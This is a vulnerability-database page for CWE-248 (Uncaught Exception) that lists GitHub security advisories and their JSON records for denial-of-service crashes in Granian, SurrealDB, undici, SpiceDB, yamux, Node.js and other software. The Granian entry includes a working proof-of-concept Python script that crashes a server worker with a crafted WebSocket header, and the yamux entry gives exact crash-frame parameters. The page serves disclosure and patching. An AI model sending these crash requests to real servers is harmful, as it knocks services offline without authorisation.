CWE-248
AllowedUncaught Exception
Abstraction: Base · Status: Draft
An exception is thrown from a function, but it is not caught.
420 vulnerabilities reference this CWE, most recent first.
GHSA-R9WJ-GM7P-2529
Vulnerability from github – Published: 2025-08-05 21:31 – Updated: 2025-10-02 18:30A denial-of-service vulnerability exists in Sysax Multi-Server version 6.10 via its SSH daemon. A specially crafted SSH key exchange packet can trigger a crash in the service, resulting in loss of availability. The flaw is triggered during the handling of malformed key exchange data, including a non-standard byte (\x28) in place of the expected SSH protocol delimiter.
{
"affected": [],
"aliases": [
"CVE-2013-10065"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-05T20:15:35Z",
"severity": "HIGH"
},
"details": "A denial-of-service vulnerability exists in\u00a0Sysax Multi-Server version 6.10 via its SSH daemon. A specially crafted SSH key exchange packet can trigger a crash in the service, resulting in loss of availability. The flaw is triggered during the handling of malformed key exchange data, including a non-standard byte (\\x28) in place of the expected SSH protocol delimiter.",
"id": "GHSA-r9wj-gm7p-2529",
"modified": "2025-10-02T18:30:56Z",
"published": "2025-08-05T21:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10065"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb"
},
{
"type": "WEB",
"url": "https://www.mattandreko.com/2013/04/08/sysax-multi-server-6.10-ssh-dos"
},
{
"type": "WEB",
"url": "https://www.sysax.com"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/sysax-multi-server-sshd-key-exchange-dos"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RJV5-CQP8-H968
Vulnerability from github – Published: 2025-09-17 18:31 – Updated: 2025-09-17 18:31CISA Thorium uses '.unwrap()' to handle errors related to account verification email messages. An unauthenticated remote attacker could cause a crash by providing a specially crafted email address or response. Fixed in commit 6a65a27.
{
"affected": [],
"aliases": [
"CVE-2025-35436"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-17T17:15:44Z",
"severity": "MODERATE"
},
"details": "CISA Thorium uses \u0027.unwrap()\u0027 to handle errors related to account verification email messages. An unauthenticated remote attacker could cause a crash by providing a specially crafted email address or response. Fixed in commit 6a65a27.",
"id": "GHSA-rjv5-cqp8-h968",
"modified": "2025-09-17T18:31:18Z",
"published": "2025-09-17T18:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35436"
},
{
"type": "WEB",
"url": "https://github.com/mjcarson/thorium/commit/6a65a2711fb2387e8c3eacebc774053741bf5aeb"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-259-01.json"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-35436"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RQ86-9M6R-CM3G
Vulnerability from github – Published: 2025-04-10 21:05 – Updated: 2025-04-10 21:05A vulnerability was found where an attacker can crash the database via crafting a HTTP query that returns a null byte. The problem relies on an uncaught exception in the net module, where the result of the query will be converted to JSON before showing as the HTTP response to the user in the /sql endpoint.
Impact
This vulnerability allows any authenticated user to crash a SurrealDB instance by sending a crafted query with a null byte to the /sql endpoint.
Where SurrealDB is used as an application backend, it is possible that an application user can crash the SurrealDB instance and thus the supported application through crafted inputs that exploit this attack vector.
Patches
A patch has been introduced that ensures the error is caught and converted as an error. - Versions 2.2.2, 2.1.5 and 2.0.5 and later are not affected by this isssue
Workarounds
Affected users who are unable to update may want to limit the ability of untrusted clients to run arbitrary queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.
Where SurrealDB is used as an application backend, ensure sanitisation of input at the application layer to prevent injection attacks.
References
https://github.com/surrealdb/surrealdb/pull/5647
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "surrealdb"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "crates.io",
"name": "surrealdb"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "crates.io",
"name": "surrealdb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-10T21:05:34Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "A vulnerability was found where an attacker can crash the database via crafting a HTTP query that returns a null byte. The problem relies on an uncaught exception in the `net` module, where the result of the query will be converted to JSON before showing as the HTTP response to the user in the **/sql** endpoint.\n\n### Impact\nThis vulnerability allows any authenticated user to crash a SurrealDB instance by sending a crafted query with a null byte to the /sql endpoint. \n\nWhere SurrealDB is used as an application backend, it is possible that an application user can crash the SurrealDB instance and thus the supported application through crafted inputs that exploit this attack vector.\n\n\n### Patches\nA patch has been introduced that ensures the error is caught and converted as an error.\n- Versions 2.2.2, 2.1.5 and 2.0.5 and later are not affected by this isssue\n\n### Workarounds\n\nAffected users who are unable to update may want to limit the ability of untrusted clients to run arbitrary queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.\n\nWhere SurrealDB is used as an application backend, ensure sanitisation of input at the application layer to prevent injection attacks.\n\n### References\nhttps://github.com/surrealdb/surrealdb/pull/5647",
"id": "GHSA-rq86-9m6r-cm3g",
"modified": "2025-04-10T21:05:35Z",
"published": "2025-04-10T21:05:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/surrealdb/surrealdb/security/advisories/GHSA-rq86-9m6r-cm3g"
},
{
"type": "WEB",
"url": "https://github.com/surrealdb/surrealdb/pull/5647"
},
{
"type": "PACKAGE",
"url": "https://github.com/surrealdb/surrealdb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SurrealDB has uncaught exception in Net module that leads to database crash"
}
GHSA-RRJV-57MM-J6CM
Vulnerability from github – Published: 2025-05-19 03:30 – Updated: 2025-05-19 03:30The C++ method SignTraits::DeriveBits() may incorrectly call ThrowException() based on user-supplied inputs when executing in a background thread, crashing the Node.js process. Such cryptographic operations are commonly applied to untrusted inputs. Thus, this mechanism potentially allows an adversary to remotely crash a Node.js runtime.
{
"affected": [],
"aliases": [
"CVE-2025-23166"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-19T02:15:17Z",
"severity": "HIGH"
},
"details": "The C++ method SignTraits::DeriveBits() may incorrectly call ThrowException() based on user-supplied inputs when executing in a background thread, crashing the Node.js process. Such cryptographic operations are commonly applied to untrusted inputs. Thus, this mechanism potentially allows an adversary to remotely crash a Node.js runtime.",
"id": "GHSA-rrjv-57mm-j6cm",
"modified": "2025-05-19T03:30:29Z",
"published": "2025-05-19T03:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23166"
},
{
"type": "WEB",
"url": "https://nodejs.org/en/blog/vulnerability/may-2025-security-releases"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V554-GP5G-23RQ
Vulnerability from github – Published: 2025-10-23 06:31 – Updated: 2025-10-23 06:31Uncaught Exception (CWE-248) in the Command Centre Server allows an Authorized and Privileged Operator to crash the Command Centre Server at will.
This issue affects Command Centre Server:
9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.
{
"affected": [],
"aliases": [
"CVE-2025-48430"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-23T04:16:40Z",
"severity": "MODERATE"
},
"details": "Uncaught Exception (CWE-248) in the Command Centre Server allows an Authorized and Privileged Operator to crash the Command Centre Server at will.\n\nThis issue affects Command Centre Server: \n\n9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.",
"id": "GHSA-v554-gp5g-23rq",
"modified": "2025-10-23T06:31:00Z",
"published": "2025-10-23T06:31:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48430"
},
{
"type": "WEB",
"url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48430"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V96G-5J57-774C
Vulnerability from github – Published: 2025-04-29 12:30 – Updated: 2025-07-28 15:31A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.
{
"affected": [],
"aliases": [
"CVE-2025-3891"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-29T12:15:32Z",
"severity": "MODERATE"
},
"details": "A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.",
"id": "GHSA-v96g-5j57-774c",
"modified": "2025-07-28T15:31:35Z",
"published": "2025-04-29T12:30:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-x7cf-8wgv-5j86"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3891"
},
{
"type": "WEB",
"url": "https://github.com/OpenIDC/mod_auth_openidc/commit/6a0b5f66c87184dfe0e4400f6bdd46a82dc0ec2b"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10002"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10003"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10004"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10006"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10007"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10008"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10010"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:4597"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:9396"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-3891"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2361633"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00007.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-V9P9-HFJ2-HCW8
Vulnerability from github – Published: 2026-03-13 20:41 – Updated: 2026-03-13 20:41Impact
The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.
The vulnerability exists because:
- The
isValidClientWindowBits()function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15 - The
createInflateRaw()call is not wrapped in a try-catch block - The resulting exception propagates up through the call stack and crashes the Node.js process
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2229"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:41:41Z",
"nvd_published_at": "2026-03-12T21:16:25Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"id": "GHSA-v9p9-hfj2-hcw8",
"modified": "2026-03-13T20:41:41Z",
"published": "2026-03-13T20:41:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3487486"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc7692"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodejs/undici"
},
{
"type": "WEB",
"url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation"
}
GHSA-VHVQ-FV9F-WH4Q
Vulnerability from github – Published: 2026-02-06 22:30 – Updated: 2026-02-06 22:30Description
A malformed or tampered-with LookupResources Cursor token can cause a panic in the SpiceDB process if it fails to parse. If an attacker were able to make requests to a SpiceDB instance, they could affect its availability.
Reproduction
If one was to take a cursor from a LookupResources call, decode it according to the logic that SpiceDB uses, and modify the Sections field to include an invalid relationship string, the process will panic.
Impact
An attacker would need both the ability to create a gRPC connection to your SpiceDB instance and a valid token, or else the ability to pass a cursor token from outside your application through to your SpiceDB instance.
If an attacker had this ability, they could bring down SpiceDB instances, reducing the availability of SpiceDB and any service that depends on it.
Mechanism
The SpiceDB process does not validate the contents of this Sections component of the Cursor message. In affected versions, it uses a parsing function that calls panic if the value cannot be parsed as a relationship.
Fix
This issue was fixed in https://github.com/authzed/spicedb/pull/2878.
Remediations
- Prevent client control of the
optional_cursorfield inLookupResourcescalls - Upgrade to an unaffected version
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/authzed/spicedb"
},
"ranges": [
{
"events": [
{
"introduced": "1.29.3"
},
{
"fixed": "1.49.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-06T22:30:52Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "## Description\nA malformed or tampered-with LookupResources [Cursor token](https://buf.build/authzed/api/docs/main:authzed.api.v1#authzed.api.v1.Cursor) can cause a panic in the SpiceDB process if it fails to parse. If an attacker were able to make requests to a SpiceDB instance, they could affect its availability.\n\n## Reproduction\nIf one was to take a cursor from a LookupResources call, decode it according to the logic that SpiceDB uses, and modify the Sections field to include an invalid relationship string, the process will panic.\n\n## Impact\nAn attacker would need both the ability to create a gRPC connection to your SpiceDB instance and a valid token, or else the ability to pass a cursor token from outside your application through to your SpiceDB instance.\n\nIf an attacker had this ability, they could bring down SpiceDB instances, reducing the availability of SpiceDB and any service that depends on it.\n\n## Mechanism\nThe SpiceDB process does not validate the contents of this `Sections` component of the `Cursor` message. In affected versions, it uses a parsing function that calls `panic` if the value cannot be parsed as a relationship. \n\n## Fix\nThis issue was fixed in https://github.com/authzed/spicedb/pull/2878.\n\n## Remediations\n* Prevent client control of the `optional_cursor` field in `LookupResources` calls\n* Upgrade to an unaffected version",
"id": "GHSA-vhvq-fv9f-wh4q",
"modified": "2026-02-06T22:30:52Z",
"published": "2026-02-06T22:30:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/security/advisories/GHSA-vhvq-fv9f-wh4q"
},
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/pull/2878"
},
{
"type": "WEB",
"url": "https://github.com/authzed/spicedb/commit/fa1d7f48107e0c6c35e6a7862aa983366e70208f"
},
{
"type": "PACKAGE",
"url": "https://github.com/authzed/spicedb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "LookupResources Cursor section tampering can crash SpiceDB process via tuple.MustParse panic"
}
GHSA-VRG7-482J-P6F6
Vulnerability from github – Published: 2026-05-06 21:20 – Updated: 2026-05-13 16:41Summary
Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes.
The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked.
This is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.
Details
https://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125
HeaderValue::to_str() returns Err for bytes outside visible ASCII. The subsequent .unwrap() panics.
In release builds Granian sets panic = "abort", so this panic terminates the worker instead of being handled as a normal request error.
PoC
Step 1.
starts a Granian ASGI server
# app.py
async def app(scope, receive, send):
if scope["type"] == "websocket":
await receive()
await send({"type": "websocket.accept"})
return
await send({"type": "http.response.start", "status": 200, "headers": []})
await send({"type": "http.response.body", "body": b"ok"})
granian --interface asgi app:app --host 127.0.0.1 --port 8000
Step 2.
sending a raw upgrade request with Sec-WebSocket-Protocol: \x80\xff reached this code path and caused the worker to abort.
# ws-subproto-crash.py
import base64, os, socket, sys
host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
key = base64.b64encode(os.urandom(16)).decode()
req = (
f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
"Upgrade: websocket\r\nConnection: Upgrade\r\n"
f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n"
).encode() + b"Sec-WebSocket-Protocol: \x80\xff\r\n\r\n"
with socket.create_connection((host, port), timeout=5) as s:
s.sendall(req)
print(s.recv(4096))
python ws-subproto-crash.py 127.0.0.1 8000 /
Observed server output:
thread '<unnamed>' panicked at src/asgi/utils.rs:125:44:
called `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }
[ERROR] Unexpected exit from worker-1
[INFO] Shutting down granian
Impact
- Unauthenticated remote denial of service
- One crafted request kills one worker
- The application is never reached, so application-level authentication or routing does not mitigate the issue
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "granian"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "2.7.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42544"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-248",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T21:20:48Z",
"nvd_published_at": "2026-05-12T22:16:34Z",
"severity": "HIGH"
},
"details": "### Summary\n\nGranian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose `Sec-WebSocket-Protocol` header contains non-ASCII bytes.\n\nThe crash happens in Granian\u0027s WebSocket scope construction path, before the ASGI application is invoked.\n\nThis is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.\n\n### Details\n\nhttps://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125\n\n`HeaderValue::to_str()` returns `Err` for bytes outside visible ASCII. The subsequent `.unwrap()` panics.\n\nIn release builds Granian sets `panic = \"abort\"`, so this panic terminates the worker instead of being handled as a normal request error.\n\n\n### PoC\n\n#### Step 1.\nstarts a Granian ASGI server\n\n```python\n# app.py\nasync def app(scope, receive, send):\n if scope[\"type\"] == \"websocket\":\n await receive()\n await send({\"type\": \"websocket.accept\"})\n return\n\n await send({\"type\": \"http.response.start\", \"status\": 200, \"headers\": []})\n await send({\"type\": \"http.response.body\", \"body\": b\"ok\"})\n```\n\n```bash\ngranian --interface asgi app:app --host 127.0.0.1 --port 8000\n```\n\n#### Step 2.\nsending a raw upgrade request with `Sec-WebSocket-Protocol: \\x80\\xff` reached this code path and caused the worker to abort.\n\n```python\n# ws-subproto-crash.py\nimport base64, os, socket, sys\n\nhost, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]\nkey = base64.b64encode(os.urandom(16)).decode()\n\nreq = (\n f\"GET {path} HTTP/1.1\\r\\nHost: {host}:{port}\\r\\n\"\n \"Upgrade: websocket\\r\\nConnection: Upgrade\\r\\n\"\n f\"Sec-WebSocket-Key: {key}\\r\\nSec-WebSocket-Version: 13\\r\\n\"\n).encode() + b\"Sec-WebSocket-Protocol: \\x80\\xff\\r\\n\\r\\n\"\n\nwith socket.create_connection((host, port), timeout=5) as s:\n s.sendall(req)\n print(s.recv(4096))\n```\n```bash\npython ws-subproto-crash.py 127.0.0.1 8000 /\n```\n\n\nObserved server output:\n\n```\nthread \u0027\u003cunnamed\u003e\u0027 panicked at src/asgi/utils.rs:125:44:\ncalled `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }\n[ERROR] Unexpected exit from worker-1\n[INFO] Shutting down granian\n```\n\n\n### Impact\n\n- Unauthenticated remote denial of service\n- One crafted request kills one worker\n- The application is never reached, so application-level authentication or routing does not mitigate the issue",
"id": "GHSA-vrg7-482j-p6f6",
"modified": "2026-05-13T16:41:24Z",
"published": "2026-05-06T21:20:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42544"
},
{
"type": "PACKAGE",
"url": "https://github.com/emmett-framework/granian"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Granian vulnerable to unauthenticated DoS via WebSocket subprotocol header panic"
}
GHSA-VXX9-2994-Q338
Vulnerability from github – Published: 2026-03-13 20:04 – Updated: 2026-03-16 22:01Summary
The Rust implementation of Yamux can panic when processing a crafted inbound Data frame that sets SYN and uses a body length greater than DEFAULT_CREDIT (e.g. 262145). On the first packet of a new inbound stream, stream state is created and a receiver is queued before oversized-body validation completes. When validation fails, the temporary stream is dropped and cleanup may call remove(...).expect("stream not found"), triggering a panic in the connection state machine. This is remotely reachable over a normal Yamux session and does not require authentication. kind of vulnerability is it? Who is
Attack Scenario
An attacker that can establish a Yamux session with a target node can crash the target by sending a single validly encoded Yamux Data|SYN frame with an oversized body: 1. Establish a standard authenticated transport session that negotiates Yamux. 2. Send one Yamux frame with: - Tag = Data - Flags = SYN - StreamId = 1 (or any new inbound stream id) - Length = DEFAULT_CREDIT + 1 (e.g. 262145) - Body of matching size This can trigger a panic (stream not found) and terminate the process, depending on host application panic policy.
Patches
Users should upgrade to yamux v0.13.10
This vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "yamux"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.13.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32314"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:04:38Z",
"nvd_published_at": "2026-03-16T14:19:34Z",
"severity": "HIGH"
},
"details": "### Summary\nThe Rust implementation of Yamux can panic when processing a crafted inbound Data frame that sets SYN and uses a body length greater than DEFAULT_CREDIT (e.g. 262145).\nOn the first packet of a new inbound stream, stream state is created and a receiver is queued before oversized-body validation completes. When validation fails, the temporary stream is dropped and cleanup may call remove(...).expect(\"stream not found\"), triggering a panic in the connection state machine.\nThis is remotely reachable over a normal Yamux session and does not require authentication. kind of vulnerability is it? Who is \n#### Attack Scenario \nAn attacker that can establish a Yamux session with a target node can crash the target by sending a single validly encoded Yamux Data|SYN frame with an oversized body:\n1. Establish a standard authenticated transport session that negotiates Yamux.\n2. Send one Yamux frame with:\n - Tag = Data\n - Flags = SYN\n - StreamId = 1 (or any new inbound stream id)\n - Length = DEFAULT_CREDIT + 1 (e.g. 262145)\n - Body of matching size\nThis can trigger a panic (stream not found) and terminate the process, depending on host application panic policy.\n### Patches\nUsers should upgrade to `yamux` `v0.13.10`\n\nThis vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program",
"id": "GHSA-vxx9-2994-q338",
"modified": "2026-03-16T22:01:11Z",
"published": "2026-03-13T20:04:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/libp2p/rust-yamux/security/advisories/GHSA-vxx9-2994-q338"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32314"
},
{
"type": "PACKAGE",
"url": "https://github.com/libp2p/rust-yamux"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Yamux vulnerable to remote Panic via malformed Data frame with SYN set and len = 262145"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.